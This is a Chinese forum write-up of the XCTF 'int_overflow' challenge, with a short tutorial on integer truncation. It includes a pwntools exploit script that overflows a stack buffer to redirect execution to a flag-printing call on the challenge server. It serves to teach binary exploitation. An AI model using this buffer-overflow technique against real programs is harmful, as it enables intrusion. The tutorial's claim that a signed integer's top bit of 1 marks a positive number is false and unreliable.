首页
论坛
课程
招聘
XCTF攻防世界int_overflow
2019-10-2 19:00 5598

XCTF攻防世界int_overflow

2019-10-2 19:00
5598

int_overflow题解

首先,进行程序基本信息检查:

 

 

没有canary,没有PIE。程序执行是先选择一个子流程,然后输入username,再输入passwd。这里要考虑程序是否会对输入的字符串的长度进行限制,先留心一下。

 

IDA查看一下源码:

  • 首先看一下strings:

    有收获,存在几个危险函数,而且存在"cat flag",可以考虑直接调用。

  • 进main函数看一下:

    没有发现什么大问题,直接进login。

    需要留心一下,username和passwd都做了最大长度限制。但是passwd的长度未免太长了吧。。。太可疑。

  • 进入check_passwd查看对passwd的处理:

    到这里就很明显了,函数首先设定了v3变量,但是大小只有一个字节,共8bit。前面对passwd进行长度限制时,最大长度为0x199,这很明显一个字节存储不下。那么会发生什么呢?整数溢出。(后续会给出整数溢出的相关知识介绍)

    输入的passwd的长度给到v3,进行判断,因为存在整数溢出,所以这里输入的字符的个数不管是3~8还是259~264都是可以通过验证的。再往下,使用strcpy将passwd拷贝进stack中,stack中给出的保存passwd的大小为0x14 :

如果输入的passwd的字符个数超过了0x14,那么就会覆盖到stack中的内容。

  • 覆盖数据计算:

    思路已经确定,利用整数溢出漏洞来输入大量的passwd字符造成栈溢出。具体长度只要在259~264之间即可。此处选择262。看一下汇编确认具体的填充数据结构:

    从汇编代码中可以看到,想要覆盖到返回地址,先使用0x14 个数据覆盖stack拷贝的passed的内存区域,然后使用4字节数据覆盖ebp,再使用"cat flag"的地址覆盖返回地址,最后接上262剩余的数据即可。

    所以payload的构成为:

      payload = "A"*0x14 +"AAAA"+ P32(cat_flag_addr) + "A"*234(262-0x14-4-4)
    

EXP:

from pwn import *

sh=remote('111.198.29.45',44241)

sh.sendlineafter("choice:","1")
sh.sendlineafter("username:\n","xctf")

cat_flag_addr = 0x08048694
payload = "A" * 0x14 + "AAAA" + p32(cat_flag_addr) + "A" * 234

sh.sendlineafter("passwd:\n",payload)
print sh.recvall()

执行结果

整数溢出的相关知识

整数分为有符号和无符号两种类型,有符号数以最高位作为其符号位,即正整数 最高位为1,负数为0,无符号数取值范围为非负数,常见各类型占用字节数如下:

 

 

对于unsigned short int类型的数据,var1 = 1,var2 = 65537,用计算器看一下:

 

 

 

65537会发生高位截断,截断之后最高位的1被舍弃,这样数据就变成了1。使用代码验证一下:

#include <stdio.h>
int main(){
    unsigned short int a = 1;
    unsigned short int b = 65537;
    if(a == b){
        printf("Int overflow sucssesfully!\n");
    }
    return 0;
}

编译运行之后如下:

 

 

也就是说,对于一个2字节的unsigned short int 型变量,它的有效数据长度为2个字节,当它的数据长度超过2个字节时,就发生溢出,溢出的部分则直接忽略。使用相关变量时,使用的数据仅为最后2个字节,因此就会出现65537等于1的情况,其他类型变量和数值与之类似,更为详细的说明可以参考ctf-all-in-one。


[公告]《CTF高级解混淆》训练营,国际顶尖CTF战队大牛亲自授课,助你快速成长!

收藏
点赞0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回